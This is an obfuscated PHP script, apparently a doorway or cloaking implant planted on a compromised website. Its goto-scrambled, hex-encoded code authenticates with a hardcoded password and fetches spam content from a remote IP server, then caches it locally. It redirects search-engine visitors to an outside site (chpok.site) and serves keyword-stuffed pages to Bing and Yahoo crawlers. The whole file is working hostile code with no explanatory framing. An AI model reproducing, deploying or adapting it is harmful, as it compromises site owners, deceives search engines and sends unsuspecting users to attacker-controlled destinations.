<?php
 goto yKQWb; FVAh0: $s = $_SERVER["\123\x45\x52\126\x45\122\137\116\x41\x4d\x45"] . $s; goto AZQdt; pVoTe: $_GET["\167\x6f\162\x6c\x64"] = 5; goto JpXqP; Jxcjk: $apass2 = "\x62\x32\63\x68\162\x32\x33\166\162\x33\x32"; goto Qi95x; bulA3: $query_pars_2 = str_replace("\x2d", "\x2b", $_GET["\151\144"]); goto S5yYu; hi_0e: $x1 = 3; goto H51Zi; MVpwE: $keyword = str_replace("\40", "\x2b", $keyword); goto Jxcjk; Qi95x: $s = dirname($_SERVER["\x50\x48\120\137\x53\x45\114\106"]); goto QIUH3; KT0sB: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto BWIFl; yKQWb: error_reporting(0); goto wcz3C; unufT: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\x70\x3a\57\57\x31\x33\65\x2e\x31\x38\61\56\62\x31\x2e\x31\62\66\x2f" . $_GET["\x66\x6e"] . "\56\x70\x68\x70\x3f\x70\x61\163\163\75{$apass}\x26\x71\75{$_GET["\x69\x64"]}"); } goto z1FEe; KOuwL: $apass1 = "\166\151\163\144\x6f\x69\152\x65\167"; goto hi_0e; S5yYu: $text = ''; goto JFKwV; z1FEe: if (strlen($text) < 5000) { $url = "\x31\63\x35\56\x31\70\x31\56\x32\61\x2e\x31\x32\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\74\x62\162\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\x68\160\x3f\x70\x61\163\163\75{$apass}\x26\161\75{$_GET["\151\x64"]}"; $out = "\107\x45\x54\40{$req}\x20\x48\124\x54\120\57\x31\x2e\60\xd\xa"; $out .= "\x48\157\163\164\x3a\40{$url}\xd\12"; $out .= "\x43\157\x6e\156\x65\143\x74\x69\x6f\x6e\72\40\103\x6c\x6f\163\145\xd\xa\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto Ok_mX; MYuFY: if ($_GET["\151\144"] == "\x69\156\144\145\x78") { header("\114\157\143\141\164\x69\x6f\156\x3a\40\x68\x74\164\160\x73\72\x2f\x2f\x67\x6f\157\x67\154\x65\56\143\157\x6d"); die; } goto pVoTe; QIUH3: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto FVAh0; mkKKd: if ($_GET["\151\144"] == "\164\145\163\x74\151\x6e\147") { echo "\x74\145\x73\164\40\147\157\157\x64\x2e\x2e\56"; die; } goto MYuFY; P72Ra: $keyword = str_replace("\x2d", "\x20", $_GET["\x69\144"]); goto MVpwE; SY6ZI: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto mkKKd; Ok_mX: if (strlen($text) > 5000) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto yRYVf; JFKwV: if (function_exists("\143\165\162\x6c\x5f\151\x6e\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\160\x3a\x2f\57\x31\x33\65\56\x31\x38\61\56\62\x31\x2e\61\x32\66\x2f" . $_GET["\x66\156"] . "\56\x70\x68\160\77\x70\141\163\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\x69\x6c\x6c\141\57\x34\x2e\x30\40\50\143\157\x6d\x70\141\164\151\x62\x6c\x65\73\40\x4d\123\111\105\x20\66\56\x30\73\40\127\151\x6e\144\x6f\x77\163\40\x4e\x54\x20\65\x2e\61\73\x20\x53\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto unufT; JpXqP: $_GET["\146\x6e"] = "\x36\71\x36\71\66\x39\x6e\x65\x77"; goto KOuwL; yRYVf: echo $text; goto AHcpW; BWIFl: if (strpos($_SERVER["\110\x54\x54\x50\x5f\x52\105\x46\105\x52\x45\122"], "\147\x6f\157\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\x54\120\137\x52\105\x46\x45\x52\105\x52"], "\x79\141\x68\x6f\157\x2e") or strpos($_SERVER["\x48\x54\124\120\x5f\122\x45\106\x45\122\x45\x52"], "\142\151\156\x67\x2e")) { $tpl = "\x69\156\144\145\170\x2f" . $_GET["\151\x64"] . "\x2e\160\x68\160\x2e\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\157\143\x61\164\151\x6f\156\72\40\150\164\164\x70\x73\x3a\x2f\57\x63\150\160\157\x6b\56\163\151\x74\x65\x2f\x65\x6e\164\x65\x72\57\77\x6d\141\x72\x6b\x3d{$today}\55{$s}\x26\164\x70\154\x3d{$tpl}\x26\x65\x6e\147\x6b\145\x79\75{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\x70\x68\x70"; if (file_exists("\151\x6e\144\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\x69\x6e\x64\x65\x78\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\137\x55\123\105\x52\x5f\101\x47\105\x4e\124"], "\x62\x69\156\147") > 2 or strpos($_SERVER["\110\124\124\120\x5f\125\x53\x45\122\137\x41\x47\x45\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\x2d", "\40", $_GET["\151\x64"]); $html = str_replace("\x3c\x74\151\164\x6c\x65\x3e\74\57\x74\151\x74\154\145\76", "\74\x74\x69\x74\154\145\x3e{$keyword}\x3c\57\x74\x69\164\154\x65\76", $html); } echo $html; die; } } goto bulA3; wcz3C: $today = "\62\60\62\65\60\63\60\x39\x2d"; goto SY6ZI; H51Zi: $xx1 = 5; goto P72Ra; AZQdt: $apass3 = "\x72\x76\x33\62\171\x64\141\143\163\166\x73\144\166"; goto KT0sB; AHcpW: ?>